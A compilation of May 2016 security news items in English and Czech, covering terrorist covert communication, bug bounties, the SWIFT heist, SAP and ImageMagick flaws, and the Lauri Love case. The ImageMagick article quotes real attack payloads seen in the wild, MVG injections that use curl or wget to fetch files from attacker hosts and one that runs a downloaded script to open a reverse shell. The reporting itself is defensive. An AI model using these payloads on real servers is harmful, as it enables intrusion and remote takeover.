Covert Communication Techniques Used By Next Gen High Tech Terrorists
12.5.2016 Crime
With the advent of technology, terrorists have changed their strategies and converted themselves into high-tech & sophisticated groups.
“While Osama Bin Laden had his fingers on the trigger, his children have their fingers on the mouse.”
Intro
Until now people have fought for food, water or territory, but today the definition and motivation of fighting is changed i.e. terrorism. Terrorists often strike soft targets such innocent citizens and government infrastructure. The aim of terrorists is to turn people against the government. Terrorists are ahead of the Law Enforcement Agencies adapting to latest changing technology and use it as a medium to spread terror across the globe. In the recent past, terrorists had been physically present to carry out acts of terrorism. But with the advent of technology, they have changed their strategies and converted themselves into high-tech & sophisticated groups to name a few like ISIS and Al Qaeda. They have their own cyber cells and command & control centers, which are used to monitor and control their activities. This article throws light on covert communication techniques used by terrorists to communicate using various techniques.
Prologue
The increased dependency on communication and data networks, storage of information in cyber domain and their vulnerabilities to the outside world, lack of mutual consent between countries on effective control of operations in cyber domain has brought a new type of threat. Cyberspace the fifth space of warfare after land, sea, air, and space is all about the computer networks in the world and everything they connect and control via cable, fiber-optic or wireless. The internet is used for interconnecting people, including terrorists who are amongst the first to use the latest technologies even before the government agencies.
The Hyderabad Police arrested three students on 26 Dec2015 for allegedly planning to join ISIS and had “decided” to meet separatist leader Asiya Andrabi’s to seek her help to enter Pakistan-occupied Kashmir e route to Syria. ‘Youtube’ was used as a communication medium to seek help from Asiya Andrabi. In another case Delhi Police on 29 Dec 2015 arrested a former Indian Air Force official from Punjab for allegedly sharing secret documents with Pakistan’s ISI after he was “honey trapped” by a woman with links to the spy agency. Ranjith was allegedly introduced to the spy ring by an unidentified woman whom he had met over a social networking site and shared information through a fake ‘Facebook’ account.
In May 2015, when two terrorists attempted to kill a whole bunch of people in Garland, Texas, they were stopped by local law enforcement it was revealed that the morning before one of those terrorists exchanged 109 messages with an overseas terrorist. The government agencies replied, “We have no idea what he said because those messages were encrypted. That’s a big problem, and we have to grapple with it.” So here encryption played a role in the obstruction and helped in secure communication between the terrorists. In Paris Massive attack ISIS used encrypted communications via TOR and social media. For communication purpose, they used Telegram like apps, which securely communicate the messages to the other group members involved in that attack.
During the Mumbai attacks on November 2008, 10 Pakistani members of Lashkar-e-Taiba, an Islamic militant organization based in Pakistan, carried out a series of 12 coordinated shooting and bombing attacks lasting four days across Mumbai. They used GPS based maps; Satellite based phones for the communication purpose and live telecasts to monitor the event. The communication medium changed during every stage the attack. Thus it becomes very difficult for the Law Enforcement Agencies to hunt them down.
A study has shown that the commonly terrorists communicate through normal network channel using secret encoding techniques, which may not be traced out by Intelligence agencies i.e. Steganography and Hidden watermarking. These techniques with high tech encrypted communication may not be traced out through interception. They have analyzed the various social media platforms and categorized them so that their sympathizers can use these platforms with caution.
Practical Case Study Scenarios
High tech terrorist groups like LET, ISIS, etc. are using techniques such as steganography and watermarking for communicating covertly with each other. Some of the examples are discussed with actual implementations.
Common Techniques.
Using Mores Codes or DTMF audio files to send confidential codes.
Barcodes or QR Codes for GPS coordinates or location, map, auto message.
DTMF & Morse Code For Covert Communication Of Code Exchange
A person had recently identified as a suspected terrorist named Tom Corty. He was suspected of stealing missile activation codes from the Air force, which were handed to officials for a brief period of time. If suspect misuses the code then Air force may have to face some serious trouble. Thumb drive of Tom was found in formatted state and the same was used to store the activation code. Fortunately, the system had made a backup image of the drive. One of the Investigators handles this case, for getting activation code details.
The file name is win7.bak, which is back up of windows FAT file system machine. Investigator creates an image file of that backup file for fetching potential artifacts.
Found Encrypted Archive File
DTMF Code Audio File Is There In Encrypted Archive File
DTMF Code is Decoded
The Code Is Decoded i.e. AA6B A4A8 3C67 DDC7
Thus investigator successfully fetched the activation code detail from the above-mentioned code.
Barcodes or Qr Codes For GPS Coordinates or Location, Map, Auto Message
Barcode generally has 12- to 20-digit number. It is primarily used for serial numbers, pricing and inventory control of the products worldwide. The most common barcode in North America is the 12-digit Universal Product Code (UPC) code. UPC codes used with groceries and books and could be used to track any merchandise if needed. Marketers track consumer choices by analyzing what they are purchasing. With the advent of free barcode scanners on mobile devices, marketers can also pinpoint what age groups are buying what.
But barcode or Quick response code may also be used for communication too. If any terrorist group wants to communicate via covert communication, they can use this technology as a secure message passing system. Figure below shows the meeting will be held at Theatre Royal at 24 February 2016.
Qr Code of Meeting Place
Hacker reports Vulnerability in Mr. Robot Season 2 Website
12.5.2016 Hacking
Mr. Robot was the biggest 'Hacking Drama' television show of 2015 and its second season will return to American TV screens on Wednesday 13th of July 2016.
However, the new promotional website for season two of Mr. Robot has recently patched a security flaw that could have easily allowed a hacker to target millions of fans of the show.
A White Hat hacker going by the alias Zemnmez discovered a Cross-Site Scripting (XSS) vulnerability in Mr. Robot website on Tuesday, the same day Mr. Robot launched a promo for its second series.
The second season of the television show had already received praise from both critics and viewers for its relatively accurate portrayal of cyber security and hacking, something other cyber crime movies and shows have failed at badly.
The new series also features a surprising yet welcome guest: President Barack Obama, who is giving a speech about a cyber threat faced by the nation.
The flaw Zemnmez discovered on the show's website could have given him the ability to perform many malicious tasks, but being a white hat, the hacker responsibly reported the XSS flaw to Sam Esmail, the creator of Mr. Robot series, Forbes reported.
USA Network’s owner NBC Universal confirmed that the website was patched late Tuesday night, hours after Zemnmez reported the flaw.
According to Zemnmez, the flaw could allow an attacker to inject malicious Javascript to steal user information, including Facebook data that Mr. Robot website visitors enter to participate in its quiz.
"A threat actor with XSS on whoismrrobot.com could [have used] the XSS to inject Javascript, which inherits the ability to read Facebook information from the fsociety game," Zemnmez told Forbes. "This could be done mostly silently if correctly engineered with a short popup window."
Also, the flaw could also be exploited using some simple social engineering technique like phishing to get site victims to click on a malicious link that executes the Javascript code, enabling attackers to steal Facebook user's real name, email address, photos and pictures they are tagged in, Zemnmez added.
Fanoušky Androidu se pokusila podvést skupina zavirovaných Vikingů
12.5.2016 Mobilní
Před měsícem jsme si vyzkoušeli, jak principiálně funguje typický malware pro mobilní telefon, který jej skrze falešnou aplikaci a díky přemíře práv zapojí třeba do botnetu. Přesně tento typ aplikací trápí i Google a jeho katalog Play Store, protože se nejedná o viry v pravém slova smyslu, které by zneužívaly konkrétní zranitelnost v systému, a právě to by je odhalilo, ale jedná se vlastně o běžné aplikace, které jen po uživateli požadují maximum práv.
Google podobné programy dokáže automaticky filtrovat jen s obtížemi, a tak mu musejí pomáhat specialisté z bezpečnostních firem. Výzkumníci z Check Pointu například na začátku května odhalili sadu programů, kterou nazvali Viking Horde.
Podovodné programy ze sady Viking Horde
Na první pohled se jednalo o zcela běžné jednoduché hry a utility – třeba Viking Jump, nicméně aplikace dělaly i jiné kulišárny – prozradilo je třeba to, že chtěly na rootnutých telefonech provádět i nejrůznější operace s právy administrátora (základní bezpečnostní pravidlo říká, že by měl být na každém rootnutém telefonu správce, který vám oznámí, že chce aplikace provést nějakou root operaci a vyžaduje vaše svolení – podobně jako dialog UAC na Windows).
Ačkoliv byly Check Point aplikace odhalil docela brzy, během několika týdnů od publikace si je stáhly desítky tisíc uživatelů. Právě proto Google v Androidu 6 představil nový management práv a namísto odsouhlasení výčtu práv aplikace už při instalaci, se vás Android zeptá až v okamžiku, kdy je bude chtít aplikace použít, což může být pro zkušenější uživatelé otravné, ale pro ostatní spíše transparentnější, protože mohou lépe odhadnout, k čemu přesně daná aplikace práva potřebuje.
Kdo najde díru na Pornhubu, dostane až 25 tisíc dolarů
12.5.2016 Zabezpečení
Bezpečnost je na internetu velkou prioritou a na porno stránkách je neméně důležitá. Uživatelé jsou sice zvyklí vnímat erotické stránky jako zdroj podvodných inzerátů, které mohou nést malware, současně se ale provozovatelé placených serverů snaží ochránit své uživatele před únikem informací.
Pornhub, jeden z největších erotických serverů, proto nyní vypsal veřejnou soutěž, kde může kdokoli na serverech *.pornhub.com zkusit najít nějakou zranitelnost. Podmínkou je, že chybu musíte nahlásit do 24 hodin od objevení, nesmíte nic zničit, leda své vlastní účty a vše musíte pečlivě zdokumentovat.
Minimální odměna je 50 dolarů, maximální 25 000 dolarů podle závažnosti. Hodnocení, co je jak závažné je ale zcela na Pornhubu. platby jsou pak zprostředkované přes server HackerOne, který se právě na tento typ organizovaných akcí specializuje.
SWIFT odpovídá bankéřům: Za bezpečnost si zodpovídáte sami
12.5.2016 Zabezpečení
Bankovní systém s odstupem reaguje na zprávy o tom, že byla prolomeno jeho zabezpečení.
Systém, kterým komunikují banky po celém světě, se dosud pozornosti hackerů vyhýbal, ale to už teď neplatí. Podle bezpečnostních expertů byl poslední útok na účty bangladéšské centrální banku veden právě přes SWIFT.
Při útoku zmizelo 81 milionů dolarů a akce je označována za dosud největší kybernetickou zlodějnu. Sdružení SWIFT se ale brání nařčení, že jeho zabezpečení jeho systému bylo prolomeno. “SWIFT není a nemůže být odpovědný za vaše rozhodnutí ohledně výběru a implementace firewallů a vnitřní strukturu vašich sítí," zní v dopise, který rozeslalo vedení bankám.
Podle agentury Reuters bývalí zaměstnanci tvrdí, že taková upozornění banky dostávaly i v minulosti. Jen na ně příliš nereagovaly. SWIFT jako takový totiž negarantuje, že někdo nepovolaný nemůže získat přístup ke klientským klíčům. Tomu musí zabránit banky, které s přístupy operují.
Dnes SWIFT (Society for Worldwide Interbank Financial Telecommunication) používá kolem jedenácti tisíc bank a institucí po světě. Ne všechny ale využívají Alliance Access, který byl při útoku využitý.
S teorií, že za hackem stojí zmanipulovaný klient SWIFTu označovaný jako Alliance Access, přišlo britské BAE. Podle bezpečnostních expertů šlo o vysoce profesionální útok. Adrian Nish z BAE tvrdí, že takhle propracovaný model útoku ještě za svou kariéru nepotkal.
Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně
12.5.2016 Zabezpečení
Služba sice skutečně zdarma bude, ale nejen, že je pravděpodobná přítomnost reklam, ale společnost bude prodávat anonymizované uživatelské informace. To ale může spoustu zájemců odradit.
Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně
Opera Software včera uvlonila VPN aplikaci zdarma, určenou specificky pro iOS. Opera VPN, jak se služba nazývá, v základu spoléhá na stejnou společnost (kanadskou SurfEasy) jako desktopový Opera prohlížeč pro služby typu ukrývání lokace, zablokování online sledování či obcházení blacklistů spravovaných vládami, korporacemi a školami. SurfEasy norská Opera odkoupila v březnu tohoto roku.
U veřejných služeb, jako je např. Wi-Fi v kavárně, „VéPéEnka“ poskytuje zabezpečený „tunel“ k cíli, který uživatele ochraňuje před krádeží osobních informací a hesel.
Opera VPN je samostatnou službou, není dokonce ani integrována v iOS prohlížečích Opery, kterými jsou Opera Mini a Opera Coast.
Podobně jako u desktopové varianty Opery – konkrétně dubnového předběžného náhledu pro Windows, OS X a Linux, kde je již zahrnuta VPN – je i VPN na iOS zdarma jak ke stažení, tak k použití. Většina jiných VPN služeb od konkurentů požaduje měsíční nebo roční poplatky, které nebývají zrovna malé.
Ač je však Opera VPN na první pohled zdarma, firma se pro takové řešení nerozhodla z čistě šlechetných záměrů. Spoléhá se na dvě různé strategie výdělku.
Podle Chrise Houstona, ředitele SurfEasy, Opera bude do Opera VPN vkládat reklamy: Tuto možnost však prozatím objasnil jen jako „pravděpodobnou,“ spíše než jistou. „Ačkoliv tu prozatím reklamy nejsou, v budoucnu pravděpodobně budou do aplikace zavedeny,“ napsal v dlouhém sdělení na blogu firmy.
SurfEasy, nyní již divize Opera Software, bude také prodávat anonymizované „balíky“ dat, sesbíraných od uživatelů Opera VPN, popisuje Houston. „Tyto informace budou dostupné třetím stranám, které projeví zájem o lepší porozumění toho, jak funguje mobilní ekosystém a jak se rozvíjí.“
Data z placené VPN služby SurfEasy – ta si stále účtuje 6,49 dolarů měsíčně – a data těch, co používají desktopovou verzi VPN v prohlížeči Opera, k prodeji nejsou. Společnost si je totiž neukládá.
Houston také potvrdil spekulace: Opera přidala do desktopového prohlížeče VPN v pokusu zvýšit počty uživatelů. „Přidání VPN do desktopového prohlížeče Opera je pro Operu cesta, jak svůj prohlížeč odlišit a rozšířit tak svou uživatelskou základnu,“ uznává. V teorii platí, že čím víc uživatelů bude Opera mít, tím více peněz firma dostane od svých vyhledávacích partnerů, jimiž jsou např. Google či ruský Yandex. Tito partneři platí Opeře za to, že je má nastaveny jako základní vyhledávače ve svém prohlížeči.
Opera je pravidelně na spodní příčce v pěti nejpoužívanějších prohlížečích, a potřebuje svá čísla nutně zlepšit. Během dubna si Opera ukrojila 2% podíl ze všech uživatelů, alespoň podle americké analytické firmy Net Applications. Ač se takové číslo zdá zanedbatelné, jde o posun o osm desetin procenta oproti minulému roku, tedy o poměrně působivý 69% nárůst.
V porovnání s ostatními čtyřmi největšími hráči je však Opera benjamínkem. Google Chrome drží 41,7 % uživatelů, Internet Explorer a Edge dohromady 41,3 %, Mozilla Firefox 10,1 % a stabilní Safari do Applu je na 4,5% podílů uživatelů.
Opera VPN je ke stažení v App Storu.
Old flaw exposes SAP BUSINESS Applications across the world
12.5.2016 Vulnerebility
Security experts collected evidence that up to 36 global organizations have been hacked via exploits against an old flaw in SAP Business Applications
A five-year-old flaw in SAP software is threatening business worldwide, at least 36 global organizations have been hacked via exploits used to trigger a vulnerability in SAP Business Applications.
The flaw resides on the SAP application layer, this means that it is independent of the operating system and database application that support the SAP system.
Affected organizations operated in several industries, including energy, steel manufacturing, telecommunications, utilities, retail, and automotive.
As we have anticipated, it is an old vulnerability that was patched more than five years ago by SAP in 2010. The flaw affects the built-in functionality in SAP NetWeaver Application Server Java systems.
Experts from Onapsis security firm confirmed the existence of indicators of exploitation against 36 large-scale global enterprises across the world.
Unauthenticated remote hackers could exploit the vulnerability in SAP BUSINESS apps to gain full access to the vulnerable platforms, resulting in the disclosure of business data and processes.
“The exploitation of the SAP systems of at least 36 global organizations was publicly disclosed during 2013-2016 at a digital forum registered in China. In early 2016, we became aware of this issue after we noticed common similarities within the results of initial Onapsis Security Platform scans at SAP customers, together with indicators of compromise found at SAP forensics & incident response engagements.” reads a blog post published by the Onapsis. “The Onapsis Research Labs decided to dig deeper into this topic and realized that public information about these exploitations had been sitting in the public domain for several years. As our research indicates, companies could be actively being exploited.”
Affected companies are located in many countries, including the United States, UK, China, Germany, India, Japan, and South Korea.
Experts at Onapsis believe that it is crucial to share this information within the security industry and report the situation to the affected businesses.
The US Computer Emergency Readiness Team issued a specific Alert (TA16-132A) on the discovery made by the experts at Onapsis.
“The observed indicators relate to the abuse of the Invoker Servlet, a built-in functionality in SAP NetWeaver Application Server Java systems (SAP Java platforms). The Invoker Servlet contains a vulnerability that was patched by SAP in 2010. However, the vulnerability continues to affect outdated and misconfigured SAP systems.” states the US-CERT.
“The Invoker Servlet contains a vulnerability that was patched by SAP in 2010. However, the vulnerability continues to affect outdated and misconfigured SAP systems,” US-CERT warned.
The US CERT published the list of the SAP business solutions that may be affected by the flaw:
SAP Enterprise Resource Planning (ERP)
SAP Product Life-cycle Management (PLM)
SAP Customer Relationship Management (CRM)
SAP Supply Chain Management (SCM)
SAP Supplier Relationship Management (SRM)
SAP Enterprise Portal (EP)
SAP Process Integration (PI)
SAP Exchange Infrastructure (XI)
SAP Solution Manager (SolMan)
SAP NetWeaver Business Warehouse (BW)
SAP Business Intelligence (BI)
SAP NetWeaver Mobile Infrastructure (MI)
SAP NetWeaver Development Infrastructure (NWDI)
SAP Central Process Scheduling (CPS)
SAP NetWeaver Composition Environment (CE)
SAP NetWeaver Enterprise Search
SAP NetWeaver Identity Management (IdM)
SAP Governance, Risk & Control 5.x (GRC)
Kaspersky Lab dokáže nově zabezpečit i průmyslové systémy
12.5.2016 Zabezpečení
Specializované bezpečnostní řešení pro ochranu kritické infrastruktury a zabezpečení průmyslových podniků představila včera v Praze firma Kaspersky Lab. KICS (Kaspersky Industrial CyberSecurity) podle tvůrců přináší jednotný přístup k IT bezpečnosti pro průmyslové podniky. Novinka přitom zabezpečuje ICS/SCADA servery, HMI panely a inženýrské pracovní stanice, PLC, aniž by nějak ovlivnilo plynulost a konzistenci provozu.
KICS je ve své podstatě kombinací běžných bezpečnostních technologií přizpůsobených pro potřeby průmyslových podniků. Obsahuje ochranu proti malwaru, whitelisting a funkci pro odhalování zranitelností.
To je ale rozšířené o technologie, které jsou speciálně navržené přímo pro průmyslová prostředí – jde o kontrolu integrity PLC programů (Integrity check for PLC programs), sémantický monitoring kontroly příkazů (Semantic monitoring of proces control commands) či telemetrická data (Telemetry data), která dokážou odhalit kybernetické útoky cílící na fyzické části infrastruktury.
Speciální režim Observability Mode se pak soustředí na odhalení kybernetických útoků, chyby provozního personálu a anomálie uvnitř průmyslové sítě. Centrální řídící panel pak umožňuje administrovat veškeré bezpečnostní prvky firmy Kaspersky Lab – tedy od antivirů až pro sofistikované systémy pro SCADA. Řešení lze prý implementovat i do už existující ICS sítě a technologického procesu dané organizace.
Dodavatel navíc ke KICS poskytuje celou řadu doprovodných služeb včetně kyberbezpečnostních školení (cybersecurity training) pro IT profesionály či vzdělávacích programů pro běžné zaměstnance nebo penetrační testování (Cyber Security and Penetration Testing).
Další služba -- Incident Response -- podle jejích dodavatelů pomáhá lokalizovat narušení sítě, zmírnit následky, zamezit útočníkům hlouběji proniknout do infrastruktury, předcházet dalším útokům a rozvíjet krizový plán do budoucnosti.
WhatsApp launches Desktop Software for Windows and Mac Users
11.5.2016 IT
The most popular messaging app WhatsApp now has a fully functional desktop app – both for Mac as well as Windows platform.
Facebook-owned WhatsApp messaging software has been a mobile-only messaging platform forever, but from Tuesday, the company is offering you its desktop application for both Windows and OS X.
Few months back, WhatsApp launched a Web client that can be run through your browser to use WhatsApp on your desktop, but now users running Windows 8 or Mac OS 10.9 and above can use the new desktop app that mirrors WhatsApp messages from a user's mobile device.
According to the company's blog post, the WhatsApp desktop app is similar to WhatsApp Web with synchronized conversations and messages
Since WhatsApp desktop app is native for both Windows and OS X platform, it can support desktop notifications and keyboard shortcuts.
WhatsApp has been rising at an extraordinary pace recently. The service has over 1 Billion monthly active users.
At the beginning of the year, the company removed its yearly $1 subscription fee. Just last month, the company rolled out end-to-end encryption for all its users' communication by default.
Here's how to Download WhatsApp Desktop Software:
WhatsApp launches Desktop Software for Windows and Mac Users
Users running Windows 8 (or newer) or OS X 10.9 (or newer) can download WhatsApp desktop app available for direct downloading.
Once Downloaded, open the WhatsApp desktop app.
Scan the QR code with your mobile phone to Sync your device.
Now enjoy WhatsApping your friends and family straight from your desktop.
Facebook Open Sources its Capture the Flag (CTF) Platform
11.5.2016 Social Site
Hacking into computer, networks and websites could easily land you in jail. But what if you could freely test and practice your hacking skills in a legally safe environment?
Facebook just open-sourced its Capture The Flag (CTF) platform to encourage students as well as developers to learn about cyber security and secure coding practices.
Capture the Flag hacking competitions are conducted at various cyber security events and conferences, including Def Con, in order to highlight the real-world exploits and cyber attacks.
The CTF program is an effective way of identifying young people with exceptional computer skills, as well as teaching beginners about common and advanced exploitation techniques to ensure they develop secure programs that cannot be easily compromised.
Facebook CTF Video Demo:
Since 2013, Facebook has itself hosted CTF competitions at events across the world and now, it is opening the platform to masses by releasing its source code on GitHub.
"We built a free platform for everyone to use that takes care of the backend requirements of running a CTF, including the game map, team registration, and scoring," said Gulshan Singh, Software Engineer at Facebook Threat Infrastructure.
In general, Capture The Flag competition hosts a series of security challenges, where participants have to hack into defined targets and then defending them from other skilled hackers.
"The current set of challenges include problems in reverse-engineering, forensics, web application security, cryptography, and binary exploitation. You can also build your own challenges to use with the Facebook platform for a customized competition," Mr. Singh said.
Many institutions and organizations now have realized that gamification of cyber security and hacking is beyond the traditional ways to train your mental muscles and keep sharp your skills that otherwise only come up when doomsday scenarios happen.
Pornhub Launches Bug Bounty Program; Offering Reward up to $25,000
11.5.2016 Safety
With the growing number of cyber attacks and data breaches, a significant number of companies and organizations have started Bug Bounty Programs to encourage hackers and security researchers to find and responsibly report bugs in their services and get a reward.
Now, even pornography sites are starting to embrace bug bounty practices in order to safeguard its user's security.
The world's most popular pornography site PornHub has launched a bug bounty program for security researchers and bug hunters who can find and report security vulnerabilities in its website.
Partnered with HackerOne, PornHub is offering to pay independent security researchers and bug hunters between $50 and $25,000, depending upon the impact of vulnerabilities they find.
Also Read: 10-year-old Boy becomes the youngest Bug Bounty Hacker.
HackeOne is a bug bounty startup that operates bug bounty programs for companies including Yahoo, Twitter, Slack, Dropbox, Uber, General Motors – and even the United States Department of Defense for Hack the Pentagon initiative.
"Like other major tech players have been doing as of late, we’re tapping some of the most talented security researchers as a proactive and precautionary measure – in addition to our dedicated developer and security teams – to ensure not only the security of our site but that of our users, which is paramount to us," said PornHub Vice President Corey Price.
"The brand new program provides some of our developer-savvy fans a chance to earn some extra cash – upwards to $25K – and the opportunity to be included in helping to protect and enhance the site for our 60 Million daily visitors."
How to Earn $25,000 Reward
To qualify for a bounty reward, security researchers and bug hunters must meet the following requirements:
Be the first to report a security bug directly related to the company infrastructure.
Send a description of your bug report, explaining the type of vulnerability and how it works.
Include screenshots and proof of concept code to substantiate your claim.
Disclose your finding directly and exclusively with Pornhub.
The company is currently considering serious flaws that could compromise its server and entire website.
Vulnerabilities such as cross-site request forgery (CSRF), information disclosure, cross domain leakage, XSS attacks via Post requests, HTTPS related (such as HSTS), HttpOnly and Secure cookie flags, missing SPF records and session timeout will not be considered for the bounty program.
The bounty program has currently been in a beta phase, with the company extending it via invite only. You can read complete eligibility for the bounty program on HackerOne website.
Už je to evergreen: V IE a Flash Playeru jsou kritické chyby. Mějte aktualizovaný systém
11.5.2016 Zdroj: Zive.cz Zranitelnosti
Microsoft včera vypustil do internetového éteru další várku pravidelných měsíčních záplat (patch tuesday), která tentokrát obsahovala i opravu kritické chyby CVE-2016-0189. Ačkoliv se ji snažil Microsoft udržet do vydání opravy v relativní tajnosti, kyberscéna o ní dobře věděla. Podle Symantecu potěšila třeba hackery v Jižní Koreji.
Bug v Internet Exploreru (ilustrační obrázek)
A o co vlastně šlo? O další kritickou chybu v Internet Exploreru – ano, už jej opravdu přestaňte používat. Konkrétně se jednalo o zranitelnost v jeho jádře pro běh Javascriptu (JScript 5.8) a VBS (VBScript 5.7-8), která se týkala verzí IE 9 a vyšších a všech programů, které používaly komponentu IE. Umožňovala spuštění zákeřného kódu.
Pokud jste se ale právě ušklíbli, že IE přeci vůbec nepoužíváte a vlastně ani Windows, raději nepoužívejte ani Flash Player, jednu kritickou chybu totiž včera oznámila i společnost Adobe. Zranitelnost CVE-2016-4117 v jeho Flash Playeru 21.0.0.226 a nižším se týká všech podporovaných platforem a útočník ji může zneužít k pádu aplikace, případně opět ke spuštění záškodnického kódu.
Podobné díry tu byly, jsou a budou, protože kód softwaru je stále komplikovanější a lidé prostě dělají chyby od chvíle, co slezli z afrických stromů, nicméně čím méně proprietárních technologií budeme na webu používat, tím nad ním budeme držet větší kontrolu. Nelze tedy než doufat v to, že stárnoucí Flash Player co nevidět konečně nahradí HTML a Javascript.
The ImageMagick flaw is being exploited in the wild
11.5.2016 Vulnerebility
The recently discovered ImageMagick critical vulnerability (CVE-2016-3714) is being exploited in the wild for reconnaissance.
The security researcher John Graham-Cumming from CloudFlare asserts that his firm recently discovered a critical vulnerability, code named CVE-2016-3714, in the popular image manipulation software, ImageMagick.
The flaw could be exploited by hackers to take over websites running the widely used image-enhancing app. The vulnerability in ImageMagick App allows attackers to run arbitrary code on the targeted web servers that rely on the app for resizing or cropping user-uploaded images.
CloudFlare has updated its Web application firewall to prevent attackers exploit the flaw in an attempt to protect its customers who have not patched their websites.
In a blog post published on May 9th , 2016, John Graham-Cumming explained that the flaw is being triggered in the wild for reconnaissance.
“We began watching the exploitation of CVE-2016-3714 as soon as the WAF rule went live across our network,”. He went further to say, “the bad news is that this vulnerability is being actively used by hackers to attack websites’’ and that “all these payloads are designed to give the hacker unrestricted access to the vulnerable Web server such that with a single exploit they can gain remote access and then proceed to further hack the vulnerable Web server at their leisure.” reads the post.
Graham-Cumming also revealed that the most common payload used in the attacks contains the following snippet that is harmless but that may have been using to verify is the target is vulnerable.
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something
someting_by_nebezial-d5cdlor.jpg";curl "example.com)'
Another type of payload introduced in the post allows the attacker to download a file from a remote server he controls directly on the vulnerable server.
fill 'url(https://127.0.0.0/sdfsdf.jpg"|wget -o- a0074942.example.com/dfgdfg >
"/tmp/dfgfdgfdg)'
“The attacker downloads a file (presumably from a server they control) using wget and saves it to a file on the website’s server. This could be the prelude to a larger attack and the contents of the temporary file would likely contain a program to be executed on the web server giving the attacker access.” continues the post.
Over the weekend, researchers observed a much more dangerous payload that downloads a python program called
x.py
from a server the attack controls, saves it as
/tmp/x.py
and then executes it.
fill 'url(https://example.com/image.jpg"|wget http://example.com/x.py
-o /tmp/x.py && python /tmp/x.py xx.xx.15.179 80")'
“This downloads a python program called
x.py
from a server the attack controls, saves it as
/tmp/x.py
and then executes it. The parameters to the program are the IP address and port of a machine to contact. The python code connects to that machine and makes a shell available on the web server to the attacker. At that point the attacker can interact directly with the web server.”
Corroborating the findings of CloudFlare about the exploitation of the ImageMagick flaw, the researchers from the Sucuri firm confirmed to have spotted cyberattackers attempting to install reverse shells on vulnerable servers. One of the exploits was re-directing to an IP (Internet Protocol) address registered to Linode, a virtual private server provider which the attackers potentially used to host a command and control channel. The real HTTP requests used in the cyber-attack emanated from a server with a Taiwanese IP address.
This vulnerability encompasses the method ImageMagick parses video files with the MVG file extension which enables cyberattackers to manipulate them as JPG files that contain malformed file paths hence allowing remote hackers to break out of the image manipulation flow and execute their own shell commands.
Administrators of servers which deploy the ImageMagick app directly or indirectly must ensure they upgrade them as quickly as possible.
“At the current time we do not know of a website that has been successfully hacked using ImageTragick, but it is clear that hackers are actively trying this vulnerability as it is fresh and many servers are likely to not have been patched yet.” concludes CloudFlare.
British Hacker Wins Legal Battle Over Encryption Keys
11.5.2016 Security
Britain's top crime fighting force has failed in a legal attempt to force alleged hacker Lauri Love to hand over his hard disk's encryption keys. In a landmark case, District Judge Nina Tempia said the investigative agency should have used the normal police powers rather than a civil action to obtain the evidence. Lauri Love, a 31-year-old hacker, has been accused of aiding cyber-attacks against U.S. targets, including NASA, FBI, US Army and US Federal Reserve networks.
The National Crime Agency (NCA) has failed in a legal attempt to force the British citizen and political hacktivist Lauri Love to hand over the keys to encrypted data that has been seized from his home two years ago.
At a Tuesday hearing in Court Seven at Westminster Magistrates' Court, the NCA's application to make Love disclose his encrypted computer passwords was refused by the judge.
Hacker Fighting Extradition to U.S.
Love, 31, is currently fighting extradition to the United States where he faces up to 100 years in prison for allegedly hacking into the Federal Bureau Investigation (FBI), the National Aeronautics and Space Administration (NASA), the US Missile Defence Agency, and Federal Reserve Bank of New York during 2012 and 2013.
United States Prosecutors claim that Love was allegedly involved in the online protest #OpLastResort linked with the Anonymous group, following the untimely death of online activist Aaron Swartz, who committed suicide in 2013 while under federal charges of data theft.
Love was initially arrested from his home in Stradishall, England back in October 2013, when the British police seized his encrypted computers and hard drives. The NCA later asked the courts to force Love to turn over keys to decrypt his computer's hard drives.
The files that authorities say could contain data from the US Senate and the Department of Energy on Love's computer has been encrypted with Truecrypt, a popular software for encrypting data.
Initially, the British agency attempted to compel Love to hand over his encryption keys and passwords under Section 49 of the Regulation of Investigatory Powers Act (RIPA) 2000, but was failed after his refusal.
British Govt vs. Lauri Love
Love, who is currently on bail, launched a legal action against the NCA to return his computer equipment. However, the agency refused, claiming the devices could contain data that he did not legally belongs to him – for example, hacked files.
So, as part of those civil proceedings, the agency made an application to force Love to hand over his "encryption key or password" for the encrypted data found on his computer and hard drives.
However, Judge Nina Tempia of Westminster Magistrates' Court in London ruled in favor of Love, saying the NCA can not force Love to disclose his passwords and encryption keys to prove his ownership of the data.
Tempia also said the NCA has attempted to "circumvent" the RIPA act, which she described as the "specific legislation that has been passed to deal with the disclosure sought."
"I am not granting the application because to obtain the information sought the correct procedure to be used, as the NCA did two-and-a-half years ago, is under section 49 RIPA, with the inherent HRA safeguards incorporated therein," Tempia wrote in her ruling on Tuesday.
The NCA has yet to comment on the court proceedings. However, Love was "happy" with the result. Speaking outside court, he said: "It is a victory, although it is a more an avoidance of disaster."
The court hearing revolving around the return of Love's computer equipment is scheduled for July 28.
Seoul blames North Korea for hacking a South Korean defense contractor
11.5.2016 Hacking
Is the North Korea behind the hack of a South Korean defense contractor? The officials announced an investigation into the security incident.
There is a constant tension between South Korea and the North, now the Government of Seoul is accusing Pyongyang for a cyber attack that in April last hit a navy defence contractor, the Hanjin Heavy Industries & Construction Co. On the other side, the North Korea denies any involvement and sustains that attribution is political.
The local media agency Yonhap reported that the government of Seoul suspects the involvement of the North Korean cyber army.
“After identifying signs that Hanjin Heavy Industries may have been hacked on April 20, the Defense Security Command is currently leading a security investigation into whether any military secrets were leaked and whether North Korea was involved,” states the Yonhap citing unnamed officials.
The Hanjin Heavy Industries & Construction Co provides naval vessels and amphibious assault vehicles (e.g. ROKS Dokdo) to the South Korea.
North Korea vs south
Anyway, the Officials confirmed that there is no concrete evidence proving the involvement of NK hackers.
“North Korea could have been involved, but we are not absolutely sure at this stage,” confirmed the official.
Salted Hash reported that his sources close to active IR investigations hypothesized the involvement of a notorious APT, the Lazarus Group. The Lazarus Group is believed to be behind the Sony Pictures hack and multiple security breaches suffered companies in South Korea.
South Korean companies in the defence industry are privileged targets for hackers, in November unknown hackers hit the contractor LIG Nex1 and the Agency for Defense Development. Government investigators suspect that the attackers were interested in the project of the AESA radar.
In September 2013, experts at Kaspersky discovered the espionage activity conducted by another group of hackers dubbed Icefog, an APT specialized in “hit and run” attacks against very specific targets, including several industrial and high-tech organizations in South Korea and Japan.
North Korea holds an impressive army of cyber warriors, with over 6,000 sophisticated professionals. The cyber army is trained and operates in an isolated department called Bureau 121.
